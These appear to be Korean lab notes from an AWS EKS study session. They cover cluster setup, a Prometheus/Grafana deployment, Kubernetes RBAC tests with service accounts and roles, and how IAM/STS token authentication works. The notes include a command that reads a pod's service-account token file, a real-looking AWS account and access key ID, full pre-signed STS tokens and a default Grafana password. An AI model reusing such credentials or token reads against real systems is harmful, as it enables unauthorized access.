# YAML 파일 다운로드
curl -O https://s3.ap-northeast-2.amazonaws.com/cloudformation.cloudneta.net/K8S/eks-oneclick5.yaml
# CloudFormation 스택 배포
예시) aws cloudformation deploy --template-file eks-oneclick5.yaml --stack-name myeks --parameter-overrides KeyName=kp-gasida SgIngressSshCidr=$(curl -s ipinfo.io/ip)/32 MyIamUserAccessKeyID=AKIA5... MyIamUserSecretAccessKey='CVNa2...' ClusterBaseName=myeks --region ap-northeast-2
# CloudFormation 스택 배포 완료 후 작업용 EC2 IP 출력
aws cloudformation describe-stacks --stack-name myeks --query 'Stacks[*].Outputs[0].OutputValue' --output text
# 작업용 EC2 SSH 접속
ssh -i ./ejl-eks.pem ec2-user@$(aws cloudformation describe-stacks --stack-name myeks --query 'Stacks[*].Outputs[0].OutputValue' --output text --profile ejl-personal)
# devops 담장자2 PC
ssh -i ./ejl-eks.pem root@<Public IP>
# default 네임스페이스 적용
kubectl ns default
# 노드 정보 확인 : t3.medium
kubectl get node --label-columns=node.kubernetes.io/instance-type,eks.amazonaws.com/capacityType,topology.kubernetes.io/zone
# ExternalDNS
MyDomain=22joo.shop
echo "export MyDomain=22joo.shop" >> /etc/profile
MyDnzHostedZoneId=$(aws route53 list-hosted-zones-by-name --dns-name "${MyDomain}." --query "HostedZones[0].Id" --output text)
echo $MyDomain, $MyDnzHostedZoneId
curl -s -O https://raw.githubusercontent.com/gasida/PKOS/main/aews/externaldns.yaml
MyDomain=$MyDomain MyDnzHostedZoneId=$MyDnzHostedZoneId envsubst < externaldns.yaml | kubectl apply -f -
# kube-ops-view
helm repo add geek-cookbook https://geek-cookbook.github.io/charts/
helm install kube-ops-view geek-cookbook/kube-ops-view --version 1.2.2 --set env.TZ="Asia/Seoul" --namespace kube-system
kubectl patch svc -n kube-system kube-ops-view -p '{"spec":{"type":"LoadBalancer"}}'
kubectl annotate service kube-ops-view -n kube-system "external-dns.alpha.kubernetes.io/hostname=kubeopsview.$MyDomain"
echo -e "Kube Ops View URL = http://kubeopsview.$MyDomain:8080/#scale=1.5"
# AWS LB Controller
helm repo add eks https://aws.github.io/eks-charts
helm repo update
helm install aws-load-balancer-controller eks/aws-load-balancer-controller -n kube-system --set clusterName=$CLUSTER_NAME \
--set serviceAccount.create=false --set serviceAccount.name=aws-load-balancer-controller
# gp3 스토리지 클래스 생성
kubectl apply -f https://raw.githubusercontent.com/gasida/PKOS/main/aews/gp3-sc.yaml
# 노드 IP 확인 및 PrivateIP 변수 지정
N1=$(kubectl get node --label-columns=topology.kubernetes.io/zone --selector=topology.kubernetes.io/zone=ap-northeast-2a -o jsonpath={.items[0].status.addresses[0].address})
N2=$(kubectl get node --label-columns=topology.kubernetes.io/zone --selector=topology.kubernetes.io/zone=ap-northeast-2b -o jsonpath={.items[0].status.addresses[0].address})
N3=$(kubectl get node --label-columns=topology.kubernetes.io/zone --selector=topology.kubernetes.io/zone=ap-northeast-2c -o jsonpath={.items[0].status.addresses[0].address})
echo "export N1=$N1" >> /etc/profile
echo "export N2=$N2" >> /etc/profile
echo "export N3=$N3" >> /etc/profile
echo $N1, $N2, $N3
# 노드 보안그룹 ID 확인
NGSGID=$(aws ec2 describe-security-groups --filters Name=group-name,Values=*ng1* --query "SecurityGroups[*].[GroupId]" --output text)
aws ec2 authorize-security-group-ingress --group-id $NGSGID --protocol '-1' --cidr 192.168.1.100/32
aws ec2 authorize-security-group-ingress --group-id $NGSGID --protocol '-1' --cidr 192.168.1.200/32
# 워커 노드 SSH 접속
for node in $N1 $N2 $N3; do ssh -o StrictHostKeyChecking=no ec2-user@$node hostname; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node hostname; done
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node hostname; done
ip-192-168-1-231.ap-northeast-2.compute.internal
ip-192-168-2-179.ap-northeast-2.compute.internal
ip-192-168-3-12.ap-northeast-2.compute.internal
# 사용 리전의 인증서 ARN 확인
CERT_ARN=`aws acm list-certificates --query 'CertificateSummaryList[].CertificateArn[]' --output text`
echo $CERT_ARN
# repo 추가
helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
# 파라미터 파일 생성 : PV/PVC(AWS EBS) 삭제에 불편하니, 4주차 실습과 다르게 PV/PVC 미사용
cat <<EOT > monitor-values.yaml
prometheus:
prometheusSpec:
podMonitorSelectorNilUsesHelmValues: false
serviceMonitorSelectorNilUsesHelmValues: false
retention: 5d
retentionSize: "10GiB"
ingress:
enabled: true
ingressClassName: alb
hosts:
- prometheus.$MyDomain
paths:
- /*
annotations:
alb.ingress.kubernetes.io/scheme: internet-facing
alb.ingress.kubernetes.io/target-type: ip
alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
alb.ingress.kubernetes.io/success-codes: 200-399
alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
alb.ingress.kubernetes.io/group.name: study
alb.ingress.kubernetes.io/ssl-redirect: '443'
grafana:
defaultDashboardsTimezone: Asia/Seoul
adminPassword: prom-operator
defaultDashboardsEnabled: false
ingress:
enabled: true
ingressClassName: alb
hosts:
- grafana.$MyDomain
paths:
- /*
annotations:
alb.ingress.kubernetes.io/scheme: internet-facing
alb.ingress.kubernetes.io/target-type: ip
alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
alb.ingress.kubernetes.io/success-codes: 200-399
alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
alb.ingress.kubernetes.io/group.name: study
alb.ingress.kubernetes.io/ssl-redirect: '443'
alertmanager:
enabled: false
EOT
cat monitor-values.yaml | yh
# 배포
kubectl create ns monitoring
helm install kube-prometheus-stack prometheus-community/kube-prometheus-stack --version 57.2.0 \
--set prometheus.prometheusSpec.scrapeInterval='15s' --set prometheus.prometheusSpec.evaluationInterval='15s' \
-f monitor-values.yaml --namespace monitoring
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k get pods -n monitoring
NAME READY STATUS RESTARTS AGE
kube-prometheus-stack-grafana-64854dfdc4-nbfrz 3/3 Running 0 38s
kube-prometheus-stack-kube-state-metrics-5c6549bfd5-q5klr 1/1 Running 0 38s
kube-prometheus-stack-operator-76bf64f57d-rjb5p 1/1 Running 0 38s
kube-prometheus-stack-prometheus-node-exporter-6rfwm 1/1 Running 0 38s
kube-prometheus-stack-prometheus-node-exporter-m74dv 1/1 Running 0 38s
kube-prometheus-stack-prometheus-node-exporter-qhrlm 1/1 Running 0 38s
prometheus-kube-prometheus-stack-prometheus-0 2/2 Running 0 32s
# Metrics-server 배포
kubectl apply -f https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml
# 프로메테우스 ingress 도메인으로 웹 접속
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -e "Prometheus Web URL = https://prometheus.$MyDomain"
Prometheus Web URL = https://prometheus.22joo.shop
# 그라파나 웹 접속 : 기본 계정 - admin / prom-operator
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -e "Grafana Web URL = https://grafana.$MyDomain"
Grafana Web URL = https://grafana.22joo.shop
인증(Authentication)
인가(Authorization)
RBAC 발음
을 어떻게 하시나요?.kube/config 파일 내용
clusters : kubectl 이 사용할 쿠버네티스 API 서버의 접속 정보 목록. 원격의 쿠버네티스 API 서버의 주소를 추가해 사용 가능
users : 쿠버네티스의 API 서버에 접속하기 위한 사용자 인증 정보 목록. (서비스 어카운트의 토큰, 혹은 인증서의 데이터 등)
contexts : cluster 항목과 users 항목에 정의된 값을 조합해 최종적으로 사용할 쿠버네티스 클러스터의 정보(컨텍스트)를 설정.
네임스페이스와 서비스 어카운트 생성 후 확인
# 네임스페이스(Namespace, NS) 생성 및 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create namespace dev-team
namespace/dev-team created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create ns infra-team
namespace/infra-team created
# 네임스페이스 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get ns
NAME STATUS AGE
default Active 40m
dev-team Active 21s
infra-team Active 17s
kube-node-lease Active 40m
kube-public Active 40m
kube-system Active 40m
monitoring Active 18m
# 네임스페이스에 각각 서비스 어카운트 생성 : serviceaccounts 약자(=sa)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create sa dev-k8s -n dev-team
serviceaccount/dev-k8s created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create sa infra-k8s -n infra-team
serviceaccount/infra-k8s created
# 서비스 어카운트 정보 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa -n dev-team
NAME SECRETS AGE
default 0 79s
dev-k8s 0 24s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa dev-k8s -n dev-team -o yaml | yh
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: "2024-04-12T12:35:57Z"
name: dev-k8s
namespace: dev-team
resourceVersion: "11311"
uid: 223a186a-05f2-43e8-aa9b-3f5ae38b7208
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]#
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa -n infra-team
NAME SECRETS AGE
default 0 77s
infra-k8s 0 23s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa infra-k8s -n infra-team -o yaml | yh
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: "2024-04-12T12:36:00Z"
name: infra-k8s
namespace: infra-team
resourceVersion: "11322"
uid: 791eb437-4f51-4d32-9d92-4cdb4362f9c3
서비스 어카운트를 지정하여 파드 생성 후 권한 테스트
# 각각 네임스피이스에 kubectl 파드 생성 - 컨테이너이미지
cat <<EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
name: dev-kubectl
namespace: dev-team
spec:
serviceAccountName: dev-k8s
containers:
- name: kubectl-pod
image: bitnami/kubectl:1.28.5
command: ["tail"]
args: ["-f", "/dev/null"]
terminationGracePeriodSeconds: 0
EOF
------------------------------------
cat <<EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
name: infra-kubectl
namespace: infra-team
spec:
serviceAccountName: infra-k8s
containers:
- name: kubectl-pod
image: bitnami/kubectl:1.28.5
command: ["tail"]
args: ["-f", "/dev/null"]
terminationGracePeriodSeconds: 0
EOF
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod -A
NAMESPACE NAME READY STATUS RESTARTS AGE
dev-team dev-kubectl 1/1 Running 0 37s
infra-team infra-kubectl 1/1 Running 0 29s
# 파드에 기본 적용되는 서비스 어카운트(토큰) 정보 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it dev-kubectl -n dev-team -- ls /run/secrets/kubernetes.io/serviceaccount
ca.crt namespace token
# 상세 정보 확인
kubectl exec -it dev-kubectl -n dev-team -- cat /run/secrets/kubernetes.io/serviceaccount/token
kubectl exec -it dev-kubectl -n dev-team -- cat /run/secrets/kubernetes.io/serviceaccount/namespace
kubectl exec -it dev-kubectl -n dev-team -- cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
# 각각 파드로 Shell 접속하여 정보 확인 : 단축 명령어(alias) 사용
alias k1='kubectl exec -it dev-kubectl -n dev-team -- kubectl'
alias k2='kubectl exec -it infra-kubectl -n infra-team -- kubectl'
# 권한 테스트 - 조회 불가
## kubectl exec -it dev-kubectl -n dev-team -- kubectl get pods 와 동일한 실행 명령
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "pods" in API group "" in the namespace "dev-team"
command terminated with exit code 1
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 run nginx --image nginx:1.20-alpine
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot create resource "pods" in API group "" in the namespace "dev-team"
command terminated with exit code 1
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods -n kube-system
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "pods" in API group "" in the namespace "kube-system"
command terminated with exit code 1
# (옵션) kubectl auth can-i 로 kubectl 실행 사용자가 특정 권한을 가졌는지 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 auth can-i get pods
no
각각 네임스페이스에 롤(Role)를 생성 후 서비스 어카운트 바인딩
# 각각 네임스페이스내의 모든 권한에 대한 롤 생성
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: role-dev-team
namespace: dev-team
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
EOF
-------------------------
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: role-infra-team
namespace: infra-team
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
EOF
# 롤 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get roles -n dev-team
NAME CREATED AT
role-dev-team 2024-04-12T12:45:58Z
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get roles -n infra-team
NAME CREATED AT
role-infra-team 2024-04-12T12:46:05Z
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe roles role-dev-team -n dev-team
Name: role-dev-team
Labels: <none>
Annotations: <none>
PolicyRule:
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: roleB-dev-team
namespace: dev-team
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: role-dev-team
subjects:
- kind: ServiceAccount
name: dev-k8s
namespace: dev-team
EOF
----------------------
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: roleB-infra-team
namespace: infra-team
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: role-infra-team
subjects:
- kind: ServiceAccount
name: infra-k8s
namespace: infra-team
EOF
# 롤바인딩 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get rolebindings -n dev-team
NAME ROLE AGE
roleB-dev-team Role/role-dev-team 20s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get rolebindings -n infra-team
NAME ROLE AGE
roleB-infra-team Role/role-infra-team 16s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe rolebindings roleB-dev-team -n dev-team
Name: roleB-dev-team
Labels: <none>
Annotations: <none>
Role:
Kind: Role
Name: role-dev-team
Subjects:
Kind Name Namespace
---- ---- ---------
ServiceAccount dev-k8s dev-team
서비스 어카운트를 지정하여 생성한 파드에서 다시 권한 테스트
# 각각 파드로 Shell 접속하여 정보 확인 : 단축 명령어(alias) 사용
alias k1='kubectl exec -it dev-kubectl -n dev-team -- kubectl'
alias k2='kubectl exec -it infra-kubectl -n infra-team -- kubectl'
# 권한 테스트
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods
NAME READY STATUS RESTARTS AGE
dev-kubectl 1/1 Running 0 11m
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 run nginx --image nginx:1.20-alpine
pod/nginx created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods
NAME READY STATUS RESTARTS AGE
dev-kubectl 1/1 Running 0 11m
nginx 1/1 Running 0 16s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 delete pods nginx
pod "nginx" deleted
# 권한 막히는 예시
## 다른 네임 스페이스
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods -n kube-system
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "pods" in API group "" in the namespace "kube-system"
command terminated with exit code 1
## ClusterRole 이 필요
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get nodes
Error from server (Forbidden): nodes is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "nodes" in API group "" at the cluster scope
command terminated with exit code 1
# (옵션) kubectl auth can-i 로 kubectl 실행 사용자가 특정 권한을 가졌는지 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 auth can-i get pods
yes
kubectl delete ns dev-team infra-team
동작 : 사용자/애플리케이션 → k8s 사용 시 ⇒ 인증은 AWS IAM, 인가는 K8S RBAC 기억!!
# Install
kubectl krew install access-matrix rbac-tool rbac-view rolesum whoami
# k8s 인증된 주체 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl whoami
arn:aws:iam::236747833953:user/leeeuijoo
# Show an RBAC access matrix for server resources
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl access-matrix --namespace default
NAME LIST CREATE UPDATE DELETE
alertmanagerconfigs.monitoring.coreos.com ✔ ✔ ✔ ✔
alertmanagers.monitoring.coreos.com ✔ ✔ ✔ ✔
bindings ✔
configmaps ✔ ✔ ✔ ✔
controllerrevisions.apps ✔ ✔ ✔ ✔
cronjobs.batch ✔ ✔ ✔ ✔
csistoragecapacities.storage.k8s.io ✔ ✔ ✔ ✔
daemonsets.apps ✔ ✔ ✔ ✔
deployments.apps ✔ ✔ ✔ ✔
endpoints ✔ ✔ ✔ ✔
endpointslices.discovery.k8s.io ✔ ✔ ✔ ✔
events ✔ ✔ ✔ ✔
events.events.k8s.io ✔ ✔ ✔ ✔
horizontalpodautoscalers.autoscaling ✔ ✔ ✔ ✔
ingresses.networking.k8s.io ✔ ✔ ✔ ✔
jobs.batch ✔ ✔ ✔ ✔
leases.coordination.k8s.io ✔ ✔ ✔ ✔
limitranges ✔ ✔ ✔ ✔
localsubjectaccessreviews.authorization.k8s.io ✔
networkpolicies.networking.k8s.io ✔ ✔ ✔ ✔
persistentvolumeclaims ✔ ✔ ✔ ✔
poddisruptionbudgets.policy ✔ ✔ ✔ ✔
podmonitors.monitoring.coreos.com ✔ ✔ ✔ ✔
pods ✔ ✔ ✔ ✔
pods.metrics.k8s.io ✔
podtemplates ✔ ✔ ✔ ✔
policyendpoints.networking.k8s.aws ✔ ✔ ✔ ✔
probes.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheusagents.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheuses.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheusrules.monitoring.coreos.com ✔ ✔ ✔ ✔
replicasets.apps ✔ ✔ ✔ ✔
replicationcontrollers ✔ ✔ ✔ ✔
resourcequotas ✔ ✔ ✔ ✔
rolebindings.rbac.authorization.k8s.io ✔ ✔ ✔ ✔
roles.rbac.authorization.k8s.io ✔ ✔ ✔ ✔
scrapeconfigs.monitoring.coreos.com ✔ ✔ ✔ ✔
secrets ✔ ✔ ✔ ✔
securitygrouppolicies.vpcresources.k8s.aws ✔ ✔ ✔ ✔
serviceaccounts ✔ ✔ ✔ ✔
servicemonitors.monitoring.coreos.com ✔ ✔ ✔ ✔
services ✔ ✔ ✔ ✔
statefulsets.apps ✔ ✔ ✔ ✔
targetgroupbindings.elbv2.k8s.aws ✔ ✔ ✔ ✔
thanosrulers.monitoring.coreos.com ✔ ✔ ✔ ✔
# RBAC Lookup by subject (user/group/serviceaccount) name
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool lookup
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+------------------------------------------+----------------+-------------+-------------+------------------------------------------------------+--------------------------------------------------------------+
attachdetach-controller | ServiceAccount | ClusterRole | | system:controller:attachdetach-controller | system:controller:attachdetach-controller
aws-load-balancer-controller | ServiceAccount | ClusterRole | | aws-load-balancer-controller-role | aws-load-balancer-controller-rolebinding
aws-load-balancer-controller | ServiceAccount | Role | kube-system | aws-load-balancer-controller-leader-election-role | aws-load-balancer-controller-leader-election-rolebinding
aws-node | ServiceAccount | ClusterRole | | aws-node | aws-node
bootstrap-signer | ServiceAccount | Role | kube-public | system:controller:bootstrap-signer | system:controller:bootstrap-signer
bootstrap-signer | ServiceAccount | Role | kube-system | system:controller:bootstrap-signer | system:controller:bootstrap-signer
certificate-controller | ServiceAccount | ClusterRole | | system:controller:certificate-controller | system:controller:certificate-controller
cloud-provider | ServiceAccount | Role | kube-system | system:controller:cloud-provider | system:controller:cloud-provider
...
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool lookup system:masters
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+----------------+--------------+-------------+-----------+---------------+---------------+
system:masters | Group | ClusterRole | | cluster-admin | cluster-admin
# RBAC List Policy Rules For subject (user/group/serviceaccount) name
$ kubectl rbac-tool policy-rules
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool policy-rules -e '^system:authenticated'
TYPE | SUBJECT | VERBS | NAMESPACE | API GROUP | KIND | NAMES | NONRESOURCEURI | ORIGINATED FROM
+-------+----------------------+--------+-----------+-----------------------+--------------------------+-------+------------------------------------------------------------------------------------------+-----------------------------------------+
Group | system:authenticated | create | * | authentication.k8s.io | selfsubjectreviews | | | ClusterRoles>>system:basic-user
Group | system:authenticated | create | * | authorization.k8s.io | selfsubjectaccessreviews | | | ClusterRoles>>system:basic-user
Group | system:authenticated | create | * | authorization.k8s.io | selfsubjectrulesreviews | | | ClusterRoles>>system:basic-user
Group | system:authenticated | get | * | | | | /healthz,/livez,/readyz,/version,/version/ | ClusterRoles>>system:public-info-viewer
Group | system:authenticated | get | * | | | | /api,/api/*,/apis,/apis/*,/healthz,/livez,/openapi,/openapi/*,/readyz,/version,/version/ | ClusterRoles>>system:discovery
# Generate ClusterRole with all available permissions from the target cluster
kubectl rbac-tool show
# Shows the subject for the current context with which one authenticates with the cluster
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool whoami
{Username: "arn:aws:iam::236747833953:user/leeeuijoo",
UID: "aws-iam-authenticator:236747833953:AIDATOH2FIJQS6NUPMSPJ",
Groups: ["system:authenticated"],
Extra: {accessKeyId: ["AKIATOH2FIJQYBEPSIM7"],
arn: ["arn:aws:iam::236747833953:user/leeeuijoo"],
canonicalArn: ["arn:aws:iam::236747833953:user/leeeuijoo"],
principalId: ["AIDATOH2FIJQS6NUPMSPJ"],
sessionName: [""]}}
# Summarize RBAC roles for subjects : ServiceAccount(default), User, Group
$ kubectl rolesum -h
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rolesum aws-node -n kube-system
ServiceAccount: kube-system/aws-node
Secrets:
Policies:
• [CRB] */aws-node ⟶ [CR] */aws-node
Resource Name Exclude Verbs G L W C U P D DC
cninodes.vpcresources.k8s.aws [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✔ ✖ ✖
eniconfigs.crd.k8s.amazonaws.com [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
events.[,events.k8s.io] [*] [-] [-] ✖ ✔ ✖ ✔ ✖ ✔ ✖ ✖
namespaces [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
nodes [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
pods [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
policyendpoints.networking.k8s.aws [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
policyendpoints.networking.k8s.aws/status [*] [-] [-] ✔ ✖ ✖ ✖ ✖ ✖ ✖ ✖
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rolesum -k Group system:authenticated
Group: system:authenticated
Policies:
• [CRB] */system:basic-user ⟶ [CR] */system:basic-user
Resource Name Exclude Verbs G L W C U P D DC
selfsubjectaccessreviews.authorization.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
selfsubjectreviews.authentication.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
selfsubjectrulesreviews.authorization.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
• [CRB] */system:discovery ⟶ [CR] */system:discovery
• [CRB] */system:public-info-viewer ⟶ [CR] */system:public-info-viewer
# 다른 터미널 [A tool to visualize your RBAC permissions]
$ kubectl rbac-view
## 이후 해당 작업용PC 공인 IP:8800 웹 접속 : 최초 접속 후 정보 가져오는데 다시 시간 걸림 (2~3분 정도 후 화면 출력됨)
echo -e "RBAC View Web http://$(curl -s ipinfo.io/ip):8800"
인증 / 인가 완벽 분석
핵심은 인증은 AWS IAM, 인가는 K8S RBAC에서 처리 한다!
user 가 kubectl 명령어 날림
Bearer Token (Pre-Signed URL) 이 kube-api 로 전달되는 것이 아닌 Token Review 를 위해 Webhook Token Authentication(플러그인)이 받아서 sts GetCallerIndentity 통해 IAM 에 확인 요청을 보냄
IAM 이 Validation 하였으면 Webhook Token Authentication 플러그인은 이제 configmap 으로 IAM User/role 을 비교 (예 : user or Group 정보가 리턴)
인증 완료
RBAC 을 통해 Action 을 취할 수 있는지 확인
액션 결과를 User 에게 전달
스터디 전 멤버분의 완벽 인증 & 인가 정리 Map
STS Security Token Service : AWS 리소스에 대한 액세스를 제어할 수 있는 임시 보안 자격 증명(STS)을 생성하여 신뢰받는 사용자에게 제공할 수 있음
AWS CLI 버전 1.16.156 이상에서는 별도 aws-iam-authenticator 설치 없이 aws eks get-token으로 사용 가능
# sts caller id의 ARN 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/leeeuijoo"
# kubeconfig 정보 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# cat ~/.kube/config | yh
...
users:
- name: leeeuijoo@myeks2.ap-northeast-2.eksctl.io
user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
args:
- eks
- get-token
- --output
- json
- --cluster-name
- myeks2
- --region
- ap-northeast-2
command: aws
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
interactiveMode: IfAvailable
provideClusterInfo: false
# 임시 보안 자격 증명(토큰)을 요청 : expirationTimestamp 시간경과 시 토큰 재발급됨
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks get-token --cluster-name $CLUSTER_NAME | jq -r '.status.token'
k8s-aws-v1.aHR0cHM6Ly9zdHMuYXAtbm9ydGhlYXN0LTIuYW1hem9uYXdzLmNvbS8_QWN0aW9uPUdldENhbGxlcklkZW50aXR5JlZlcnNpb249MjAxMS0wNi0xNSZYLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFUT0gyRklKUVlCRVBTSU03JTJGMjAyNDA0MTIlMkZhcC1ub3J0aGVhc3QtMiUyRnN0cyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNDEyVDEzMzQ1NFomWC1BbXotRXhwaXJlcz02MCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QlM0J4LWs4cy1hd3MtaWQmWC1BbXotU2lnbmF0dXJlPTVlMzlmNGM4M2RkODgzMTYzZWIwYmZlN2MyZGNkZDUzZmE4NTE4ZGQxZjk5ZDI1ZjAwZGQ1M2I0YjI5MzhmNTQ
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks get-token --cluster-name $CLUSTER_NAME | jq -r '.status.token'
k8s-aws-v1.aHR0cHM6Ly9zdHMuYXAtbm9ydGhlYXN0LTIuYW1hem9uYXdzLmNvbS8_QWN0aW9uPUdldENhbGxlcklkZW50aXR5JlZlcnNpb249MjAxMS0wNi0xNSZYLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFUT0gyRklKUVlCRVBTSU03JTJGMjAyNDA0MTIlMkZhcC1ub3J0aGVhc3QtMiUyRnN0cyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNDEyVDEzMzQ1NlomWC1BbXotRXhwaXJlcz02MCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QlM0J4LWs4cy1hd3MtaWQmWC1BbXotU2lnbmF0dXJlPWI4MjhiNzJjMWRmMDAzNzdmNzlkNjRjNzMxMDU0MTdkYmE0OWYzY2VhMmIzNGE3NmQ4YzYwZjdkNDczZDQzZTk
2. kubectl의 Client-Go 라이브러리는 Pre-Signed URL을 Bearer Token으로 EKS API Cluster Endpoint로 요청을 보냄
3. EKS API는 Token Review 를 Webhook token authenticator에 요청 ⇒ (STS GetCallerIdentity 호출) AWS IAM 해당 호출 인증 완료 후 User/Role에 대한 ARN 반환
# tokenreviews api 리소스 확인
## TokenReview 이 수행
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl api-resources | grep authentication
selfsubjectreviews authentication.k8s.io/v1 false SelfSubjectReview
tokenreviews authentication.k8s.io/v1 false TokenReview
# List the fields for supported resources.
$ kubectl explain tokenreviews
4. 이제 쿠버네티스 RBAC 인가를 처리
# Webhook api 리소스 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl api-resources | grep Webhook
mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration
